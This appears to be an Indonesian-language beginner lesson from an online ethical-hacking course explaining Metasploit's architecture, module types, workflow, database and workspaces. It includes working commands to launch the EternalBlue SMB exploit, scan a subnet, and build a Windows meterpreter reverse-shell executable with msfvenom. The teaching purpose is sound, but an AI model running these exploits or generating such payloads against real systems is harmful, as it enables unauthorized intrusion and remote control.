0Pricing
Ethical Hacking Academy · Pelajaran

Arsitektur Metasploit

Modul dan konsol

Arsitektur Metasploit adalah pelajaran Ethical Hacking Academy gratis di CoddyKit. Ini adalah pelajaran 1 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Ethical Hacking Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.

Apa Itu Metasploit?

Metasploit adalah kerangka kerja eksploitasi yang paling banyak digunakan. Kerangka kerja ini menyediakan pustaka terstruktur berisi eksploit, muatan, dan alat untuk menguji serta mendemonstrasikan kerentanan selama kegiatan yang berwenang.

Daripada menulis setiap serangan dari awal, Anda dapat memuat modul yang telah teruji, mengonfigurasinya, lalu menjalankannya melalui antarmuka yang konsisten.

msfconsole

Antarmuka utamanya adalah msfconsole, yaitu shell baris perintah interaktif. Antarmuka ini menyediakan pelengkapan tab, riwayat perintah, dan akses ke setiap modul.

Anda menjalankannya dari terminal, lalu bekerja sepenuhnya di dalam prompt-nya.

msfconsole
# msf6 > help

Jenis Modul

Metasploit mengatur berbagai kemampuan ke dalam jenis modul:

  • eksploit: kode yang memanfaatkan kerentanan.
  • muatan: kode yang berjalan pada target setelah eksploitasi.
  • tambahan: pemindai, fuzzing, dan alat yang tidak mengirimkan muatan.
  • pasca: tindakan pascaeksploitasi pada host yang telah disusupi.
  • pengode dan nop: membantu muatan menghindari deteksi.

Penamaan Modul

Modul menggunakan jalur hierarkis yang memberi tahu Anda secara tepat fungsinya. Dengan membaca jalur tersebut, Anda dapat mengetahui jenis, platform, dan layanan target.

exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploit

Eksploit vs Muatan

Pembedaan penting:

  • Eksploit adalah jalan masuk; eksploit menerobos perangkat lunak yang rentan.
  • Muatan adalah tindakan yang ingin Anda jalankan setelah berhasil masuk, seperti membuka shell.

Padukan keduanya: satu eksploit dapat mengirimkan banyak muatan berbeda, bergantung pada tujuan dan target Anda.

Alur Kerja Modul

Bekerja dengan modul apa pun mengikuti siklus yang dapat diulangi:

  • cari modul.
  • gunakan modul tersebut untuk memuatnya.
  • tetapkan opsi seperti RHOSTS dan LHOST.
  • jalankan atau eksploitasi modul tersebut.

Konsistensi inilah yang membuat kerangka kerja ini dapat digunakan pada ribuan modul.

use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploit

Penyimpanan Data dan Opsi

Pengaturan modul disimpan dalam penyimpanan data. Setiap opsi dapat bersifat wajib atau opsional.

  • RHOSTS: alamat target jarak jauh.
  • RPORT: port jarak jauh.
  • LHOST: alamat pendengar Anda untuk koneksi balik.
  • LPORT: port pendengar Anda.

Gunakan show options untuk melihat hal-hal yang diperlukan modul sebelum menjalankannya.

Basis Data

Metasploit terintegrasi dengan basis data PostgreSQL untuk menyimpan host, layanan, barang bukti, dan kredensial yang ditemukan selama suatu kegiatan. Dengan demikian, Anda dapat melacak cakupan yang besar secara efisien.

Jalankan basis data tersebut sebelum membuka konsol agar hasilnya tercatat secara otomatis.

msfdb init
# Inside msfconsole:
# db_status   hosts   services   creds

Modul Tambahan

Modul tambahan melakukan pekerjaan yang berguna tanpa mengeksploitasi: pemindaian port, enumerasi layanan, pemaksaan login, dan fuzzing.

Modul-modul ini sering menjadi langkah pertama Anda untuk mengumpulkan informasi yang diperlukan sebelum memilih eksploit.

use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
run

msfvenom

msfvenom adalah alat pendamping untuk menghasilkan muatan mandiri sebagai file: berkas yang dapat dieksekusi, skrip, atau shellcode yang Anda kirimkan di luar konsol.

Alat ini menggabungkan pembuatan dan pengodean muatan dalam satu perintah, sehingga berguna untuk simulasi phishing atau pengiriman khusus dalam pengujian yang berwenang.

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exe

Ruang Kerja

Untuk beberapa kegiatan, ruang kerja Metasploit menjaga agar host, layanan, dan barang bukti setiap klien tetap terpisah dalam basis data. Anda dapat berpindah di antara ruang kerja tersebut sehingga data tidak tercampur dalam berbagai penilaian.

workspace -a clientA      # add a workspace
workspace clientA         # switch to it
workspace                 # list all

Pemeriksaan Singkat

Uji pemahaman Anda tentang jenis modul.

Rangkuman

Anda telah mempelajari arsitektur Metasploit:

  • msfconsole adalah antarmuka utama; msfvenom membuat muatan mandiri.
  • Jenis modul: eksploit, muatan, tambahan, pasca, pengode/nop.
  • Jalur modul memuat informasi jenis/platform/layanan.
  • Alur kerja: cari, gunakan, tetapkan opsi, jalankan; pengaturan disimpan dalam penyimpanan data.
  • Basis data PostgreSQL melacak host, layanan, dan barang bukti.

Berikutnya: mencari dan menggunakan eksploit secara efektif.

Pertanyaan yang Sering Diajukan

Apakah pelajaran “Arsitektur Metasploit” gratis?

Ya — teks lengkap “Arsitektur Metasploit” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Ethical Hacking Academy, upgrade ke CoddyKit PRO. Kursus Ethical Hacking Academy mencakup 4 pelajaran total.

Apa yang akan aku pelajari di “Arsitektur Metasploit”?

Modul dan konsol Kamu berlatih Ethical Hacking Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.

Apakah aku perlu pengalaman untuk memulai Ethical Hacking Academy?

Tidak diperlukan pengalaman sebelumnya. Ethical Hacking Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 1 dari 4.

Berapa lama pelajaran “Arsitektur Metasploit” memakan waktu?

Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.

Bisakah aku menulis dan menjalankan kode dalam pelajaran Ethical Hacking Academy ini?

Ya. Setiap pelajaran Ethical Hacking Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.

Semua pelajaran dalam kursus ini

  1. Arsitektur Metasploit
  2. Mencari dan Menggunakan Exploit
  3. Payload dan Meterpreter
  4. Modul Pasca-Eksploitasi
← Kembali ke Ethical Hacking Academy